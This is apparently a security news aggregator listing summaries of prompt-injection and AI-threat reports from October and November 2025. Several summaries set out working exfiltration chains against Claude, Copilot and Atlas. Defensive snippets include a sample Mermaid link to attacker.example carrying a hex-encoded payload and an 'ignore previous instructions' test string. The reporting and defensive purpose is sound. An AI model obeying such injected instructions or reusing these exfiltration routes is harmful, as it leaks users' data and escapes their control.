
All news with the #prompt injection tag

Wed, November 5, 2025

Cloud CISO: Threat Actors' Growing Use of AI Tools

⚠️ Google's Threat Intelligence team reports a shift from experimentation to operational use of AI by threat actors, including AI-enabled malware and prompt-based command generation. GTIG highlighted PROMPTSTEAL, linked to APT28 (FROZENLAKE), which queries a Hugging Face LLM to generate scripts for reconnaissance, document collection, and exfiltration, while adopting greater obfuscation and altered C2 methods. Google disabled related assets, strengthened model classifiers and safeguards with DeepMind, and urges defenders to update threat models, monitor anomalous scripting and C2, and incorporate threat intelligence into model- and classifier-level protections.

read more →

Wed, November 5, 2025

GTIG: Threat Actors Shift to AI-Enabled Runtime Malware

🔍 Google Threat Intelligence Group (GTIG) reports an operational shift from adversaries using AI for productivity to embedding generative models inside malware to generate or alter code at runtime. GTIG details “just-in-time” LLM calls in families like PROMPTFLUX and PROMPTSTEAL, which query external models such as Gemini to obfuscate, regenerate, or produce one‑time functions during execution. Google says it disabled abusive assets, strengthened classifiers and model protections, and recommends monitoring LLM API usage, protecting credentials, and treating runtime model calls as potential live command channels.
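
The monitoring advice can be made concrete with a small egress-log check. The log format, endpoint list, and process allowlist below are assumptions for illustration, not GTIG tooling:

```python
# Hypothetical egress-log scan: flag processes that contact LLM API endpoints
# but are not on an approved list. Log format and host list are assumptions.
import csv

LLM_API_HOSTS = {
    "generativelanguage.googleapis.com",  # Gemini API
    "api-inference.huggingface.co",       # Hugging Face hosted inference
    "api.openai.com",
    "api.anthropic.com",
}
APPROVED_PROCESSES = {"vscode.exe", "python.exe"}  # example allowlist

def suspicious_llm_calls(log_path: str):
    """Yield (process, host) pairs where an unapproved process calls an LLM API."""
    with open(log_path, newline="") as f:
        for row in csv.DictReader(f):  # expects columns: process,dest_host
            host = row["dest_host"].lower()
            proc = row["process"].lower()
            if host in LLM_API_HOSTS and proc not in APPROVED_PROCESSES:
                yield proc, host

if __name__ == "__main__":
    # "egress.csv" is a placeholder for whatever proxy/firewall export is available.
    for proc, host in suspicious_llm_calls("egress.csv"):
        print(f"ALERT: {proc} contacted LLM endpoint {host}")
```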

read more →

Wed, November 5, 2025

Prompt Injection Flaw in Anthropic Claude Desktop Extensions

🔒 Anthropic's official Claude Desktop extensions for Chrome, iMessage, and Apple Notes were found vulnerable to web-based prompt injection that could enable remote code execution. Koi Security reported unsanitized command injection in the packaged Model Context Protocol (MCP) servers, which run unsandboxed on users' devices with full system permissions. Unlike browser extensions, these connectors can read files, execute commands and access credentials. Anthropic released a fix in v0.1.9, verified by Koi Security on September 19.

read more →

Tue, November 4, 2025

CISO Predictions 2026: Resilience, AI, and Threats

🔐 Fortinet’s CISO Collective outlines priorities and risks CISOs will face in 2026. The briefing warns that AI will accelerate innovation while expanding attack surfaces, driving more LLM breaches, adversarial model attacks, and deepfake-enabled BEC. It highlights geopolitical and space-related threats such as GPS jamming and satellite interception, persistent regulatory pressure including NIS2 and DORA, and a chronic cybersecurity skills gap. Recommendations emphasize governed AI, identity hardening, quantum readiness, and resilience-driven leadership.

read more →

Tue, November 4, 2025

Cybersecurity Forecast 2026: AI, Cybercrime, Nation-State

🔒 The Cybersecurity Forecast 2026 synthesizes frontline telemetry and expert analysis from Google Cloud security teams to outline the most significant threats and defensive shifts for the coming year. The report emphasizes how adversaries will broadly adopt AI to scale attacks, with specific risks including prompt injection and AI-enabled social engineering. It also highlights persistent cybercrime trends—ransomware, extortion, and on-chain resiliency—and evolving nation‑state campaigns. Organizations are urged to adapt IAM, secure AI agents, and harden virtualization controls to stay ahead.

read more →

Mon, November 3, 2025

AI Summarization Optimization Reshapes Meeting Records

📝 AI notetakers are increasingly treated as authoritative meeting participants, and attendees are adapting speech to influence what appears in summaries. This practice—called AI summarization optimization (AISO)—uses cue phrases, repetition, timing, and formulaic framing to steer models toward including selected facts or action items. The essay outlines evidence of model vulnerability and recommends social, organizational, and technical defenses to preserve trustworthy records.

read more →

Mon, November 3, 2025

Anthropic Claude vulnerability exposes enterprise data

🔒 Security researcher Johann Rehberger demonstrated an indirect prompt‑injection technique that abuses Claude's Code Interpreter to exfiltrate corporate data. He showed that Claude can write sensitive chat histories and uploaded documents to the sandbox and then upload them via the Files API using an attacker's API key. The root cause is the default network egress setting, "Package managers only," which still allows access to api.anthropic.com. Available mitigations — disabling network access or strict whitelisting — significantly reduce functionality.
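
A minimal sketch of the strict-whitelisting mitigation, assuming a hypothetical egress-policy hook in front of the sandbox; the host lists are illustrative, not Anthropic's configuration:

```python
# Illustrative egress allowlist for a code-execution sandbox. The point is that
# a "package managers only" policy must not implicitly include the vendor's own
# API endpoint, which is the exfiltration path described in the write-up.
from urllib.parse import urlparse

PACKAGE_MANAGER_HOSTS = {"pypi.org", "files.pythonhosted.org", "registry.npmjs.org"}
BLOCKED_HOSTS = {"api.anthropic.com"}

def egress_allowed(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    if host in BLOCKED_HOSTS:
        return False
    return host in PACKAGE_MANAGER_HOSTS

assert egress_allowed("https://pypi.org/simple/requests/")
assert not egress_allowed("https://api.anthropic.com/v1/files")
```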

read more →

Fri, October 31, 2025

Claude code interpreter flaw allows stealthy data theft

🔒 A newly disclosed vulnerability in Anthropic’s Claude AI lets attackers manipulate the model’s code interpreter to silently exfiltrate enterprise data. Researcher Johann Rehberger demonstrated an indirect prompt-injection chain that writes sensitive context to the interpreter sandbox and then uploads files using the attacker’s API key to Anthropic’s Files API. The attack abuses the default “Package managers only” network setting by leveraging access to api.anthropic.com, so exfiltration blends with legitimate API traffic. Mitigations are limited and may significantly reduce functionality.

read more →

Fri, October 31, 2025

Agent Session Smuggling Threatens Stateful A2A Systems

🔒 Unit 42 researchers Jay Chen and Royce Lu describe agent session smuggling, a technique where a malicious AI agent exploits stateful A2A sessions to inject hidden, multi‑turn instructions into a victim agent. By hiding intermediate interactions in session history, an attacker can perform context poisoning, exfiltrate sensitive data, or trigger unauthorized tool actions while presenting only the expected final response to users. The authors present two PoCs (using Google's ADK) showing sensitive information leakage and unauthorized trades, and recommend layered defenses including human‑in‑the‑loop approvals, cryptographic AgentCards, and context‑grounding checks.
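
A minimal sketch of the human-in-the-loop defense, using a generic tool-call dictionary and a console approval prompt; the tool names are hypothetical and the Unit 42 PoCs (built on Google's ADK) are not reproduced here:

```python
# Illustrative human-in-the-loop gate: sensitive tool calls requested during an
# agent-to-agent session are held for explicit approval instead of auto-executing.
SENSITIVE_TOOLS = {"execute_trade", "send_email", "read_secrets"}  # example names

def approve_tool_call(call: dict) -> bool:
    """Return True only if a human explicitly approves a sensitive call."""
    if call["tool"] not in SENSITIVE_TOOLS:
        return True  # low-risk calls pass through
    print(f"Agent requested: {call['tool']}({call.get('args', {})})")
    return input("Approve? [y/N] ").strip().lower() == "y"

# Example: a smuggled mid-session instruction asking for a trade is surfaced
# to the user rather than executed silently.
call = {"tool": "execute_trade", "args": {"ticker": "XYZ", "qty": 100}}
if not approve_tool_call(call):
    print("Blocked unapproved tool call")
```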

read more →

Fri, October 31, 2025

AI-Powered Bug Hunting Disrupts Bounty Programs and Triage

🔍 AI-powered tools and large language models are speeding up vulnerability discovery, enabling so-called "bionic hackers" to automate reconnaissance, reverse engineering, and large-scale scanning. Platforms such as HackerOne report sharp increases in valid AI-related reports and payouts, but many submissions are low-quality noise that burdens maintainers. Experts recommend treating AI as a research assistant, strengthening triage, and preserving human judgment to filter false positives and duplicates.

read more →

Thu, October 30, 2025

Five Generative AI Security Threats and Defensive Steps

🔒 Microsoft summarizes the top generative AI security risks and mitigation strategies in a new e-book, highlighting threats such as prompt injection, data poisoning, jailbreaks, and adaptive evasion. The post underscores cloud vulnerabilities, large-scale data exposure, and unpredictable model behavior that create new attack surfaces. It recommends unified defenses—such as CNAPP approaches—and presents Microsoft Defender for Cloud as an example that combines posture management with runtime detection to protect AI workloads.

read more →

Tue, October 28, 2025

AI-Powered, Quantum-Ready Network Security Platform

🔒 Palo Alto Networks presents a unified, AI-driven approach to network security that consolidates browser, AI, and quantum defenses into the Strata Network Security Platform. New offerings include Prisma Browser, a SASE-native secure browser that blocks evasive attacks and brings LLM-augmented data classification to the endpoint, and Prisma AIRS 2.0, a full-lifecycle AI security platform. The company also outlines a pragmatic path to quantum-readiness and centralizes control with Strata Cloud Manager to simplify operations across hybrid environments.

read more →

Tue, October 28, 2025

Copilot Mermaid Diagrams Could Exfiltrate Enterprise Emails

🔐 Microsoft has patched an indirect prompt injection vulnerability in Microsoft 365 Copilot that could have been exploited to exfiltrate recent enterprise emails via clickable Mermaid diagrams. Researcher Adam Logue demonstrated a multi-stage attack using Office documents containing hidden white-text instructions that caused Copilot to invoke an internal search-enterprise_emails tool. The assistant encoded retrieved emails into hex, embedded them in Mermaid output styled as a login button, and added an attacker-controlled hyperlink. Microsoft mitigated the risk by disabling interactive hyperlinks in Mermaid diagrams within Copilot chats.
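
The mitigation idea can be sketched as a post-processing filter that strips interactive directives from Mermaid source before rendering; this is an illustration of the concept, not Microsoft's actual fix, and the attacker URL and hex payload are made up:

```python
# Illustrative post-processing filter: drop Mermaid "click" directives, which
# bind hyperlinks or callbacks to nodes, before a diagram is rendered in chat.
import re

CLICK_LINE = re.compile(r"^\s*click\s+\S+.*$", re.MULTILINE)

def strip_interactive_links(mermaid_source: str) -> str:
    """Replace click directives with a Mermaid comment so nodes carry no links."""
    return CLICK_LINE.sub("%% interactive link removed", mermaid_source)

diagram = (
    "graph TD\n"
    "  A[Sign in to continue]\n"
    '  click A "https://attacker.example/?d=48656c6c6f"\n'  # hex-encoded payload in URL
)
print(strip_interactive_links(diagram))
```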

read more →

Mon, October 27, 2025

ChatGPT Atlas 'Tainted Memories' CSRF Risk Exposes Accounts

⚠️ Researchers disclosed a CSRF-based vulnerability in ChatGPT Atlas that can inject malicious instructions into the assistant's persistent memory, potentially enabling arbitrary code execution, account takeover, or malware deployment. LayerX warns that corrupted memories persist across devices and sessions until manually deleted and that Atlas' anti-phishing defenses lag mainstream browsers. The flaw converts a convenience feature into a persistent attack vector that can be invoked during normal prompts.

read more →

Mon, October 27, 2025

OpenAI Atlas Omnibox Vulnerable to Prompt-Injection

⚠️ OpenAI's new Atlas browser is vulnerable to a prompt-injection jailbreak that disguises malicious instructions as URL-like strings, causing the omnibox to execute hidden commands. NeuralTrust demonstrated how malformed inputs that resemble URLs can bypass URL validation and be handled as trusted user prompts, enabling redirection, data exfiltration, or unauthorized tool actions on linked services. Mitigations include stricter URL canonicalization, treating unvalidated omnibox input as untrusted, additional runtime checks before tool execution, and explicit user confirmations for sensitive actions.
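
A minimal sketch of the first two mitigations, treating anything that fails strict URL validation as an untrusted prompt; the heuristics are illustrative, not OpenAI's validation logic:

```python
# Illustrative omnibox triage: only treat input as a navigable URL if it parses
# strictly; everything else is handled as an untrusted prompt, never as a trusted command.
from urllib.parse import urlparse

def classify_omnibox_input(text: str) -> str:
    text = text.strip()
    parsed = urlparse(text)
    looks_like_url = (
        parsed.scheme in ("http", "https")
        and bool(parsed.hostname)
        and " " not in text            # embedded natural language is a red flag
    )
    return "navigate" if looks_like_url else "untrusted_prompt"

assert classify_omnibox_input("https://example.com/docs") == "navigate"
# A URL-like string carrying hidden instructions fails strict validation:
assert classify_omnibox_input(
    "https://example.com/ ignore previous instructions and ..."
) == "untrusted_prompt"
```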

read more →

Fri, October 24, 2025

Malicious Extensions Spoof AI Browser Sidebars, Report

⚠️ Researchers at SquareX warn that malicious browser extensions can inject fake AI sidebars into AI-enabled browsers, including OpenAI Atlas, to steer users to attacker-controlled sites, exfiltrate data, or install backdoors. The extensions inject JavaScript to overlay a spoofed assistant and manipulate responses, enabling actions such as OAuth token harvesting or execution of reverse-shell commands. The report recommends banning unmanaged AI browsers where possible, auditing all extensions, applying strict zero-trust controls, and enforcing granular browser-native policies to block high-risk permissions and risky command execution.

read more →

Thu, October 23, 2025

Spoofed AI Sidebars Can Trick Atlas and Comet Users

⚠️ Researchers at SquareX demonstrated an AI Sidebar Spoofing attack that can overlay a counterfeit assistant in OpenAI's Atlas and Perplexity's Comet browsers. A malicious extension injects JavaScript to render a fake sidebar identical to the real UI and intercepts all interactions, leaving users unaware. SquareX showcased scenarios including cryptocurrency phishing, OAuth-based Gmail/Drive hijacks, and delivery of reverse-shell installation commands. The team reported the findings to vendors but received no response by publication.

read more →

Thu, October 23, 2025

ThreatsDay: Widespread Attacks Exploit Trusted Systems

🔒 This ThreatsDay bulletin highlights a series of recent incidents where attackers favored the easiest paths in: tricking users, abusing trusted services, and exploiting stale or misconfigured components. Notable items include a malicious npm package with a post-install backdoor, a CA$176M FINTRAC penalty for missed crypto reporting, session hijacking via MCP (CVE-2025-6515), and OAuth-based persistent backdoors. Practical defenses emphasized are rapid patching, disabling risky install hooks, auditing OAuth apps and advertisers, and hardening agent and deserialization boundaries.

read more →

Thu, October 23, 2025

Agent Factory Recap: Securing AI Agents in Production

🛡️ This recap of the Agent Factory episode explains practical strategies for securing production AI agents, demonstrating attacks like prompt injection, invisible Unicode exploits, and vector DB context poisoning. It highlights Model Armor for pre- and post-inference filtering, sandboxed execution, network isolation, observability, and tool safeguards via the Agent Development Kit (ADK). The team walks through a secured DevOps assistant that blocks data-exfiltration attempts while preserving intended functionality, and offers operational guidance on multi-agent authentication, least-privilege IAM, and compliance-ready logging.
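
As an illustration of the pre-inference filtering idea (a sketch, not Model Armor), invisible Unicode can be stripped or flagged before a prompt reaches the model; the code-point list below is deliberately non-exhaustive:

```python
# Illustrative pre-inference filter: strip invisible Unicode that can smuggle
# hidden instructions past human reviewers (zero-width chars, BiDi controls,
# and Unicode "tag" characters).
INVISIBLE = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}   # zero-width characters
INVISIBLE |= set(range(0x202A, 0x202F))                 # BiDi embedding controls
INVISIBLE |= set(range(0xE0000, 0xE0080))                # tag characters

def sanitize_prompt(text: str) -> tuple[str, int]:
    """Return the cleaned text and how many invisible code points were removed."""
    cleaned = "".join(ch for ch in text if ord(ch) not in INVISIBLE)
    return cleaned, len(text) - len(cleaned)

clean, removed = sanitize_prompt("deploy to staging\u200b\U000e0041\U000e0042")
if removed:
    print(f"removed {removed} invisible characters before inference")
```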

read more →

Thu, October 23, 2025

Manipulating Meeting Notetakers: AI Summarization Risks

📝 In many organizations the most consequential meeting attendee is the AI notetaker, whose summaries often become the authoritative meeting record. Participants can tailor their speech—using cue phrases, repetition, timing, and formulaic phrasing—to increase the chance their points appear in summaries, a behavior the author calls AI summarization optimization (AISO). These tactics mirror SEO-style optimization and exploit model tendencies to overweight early or summary-style content. Without governance and technical safeguards, summaries may misrepresent debate and confer an invisible advantage to those who game the system.

read more →